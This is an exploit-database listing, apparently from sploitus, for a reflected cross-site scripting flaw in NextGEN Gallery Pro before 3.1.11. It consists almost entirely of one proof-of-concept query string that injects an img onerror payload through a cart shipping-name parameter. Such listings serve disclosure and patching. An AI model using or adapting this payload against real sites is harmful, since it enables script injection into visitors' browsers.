Exploit for NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)

Name: Exploit for NextGEN Gallery Pro < 3.1.11 - Reflected Cross-Site Scripting (XSS)
Rating: 5 (269 reviews)

2021-02-24 | CVSS 1.0

## https://sploitus.com/exploit?id=WPEX-ID:5E1A4725-3D20-44B0-8A35-BBF4263957F7
On a page where a NextGEN (Pro) gallery is embed: ?photocrati_ajax=1&action=get_cart_items&cart=&settings[shipping_address][name]=a%3Cimg%20src=x%20onerror=alert('XSS')%3E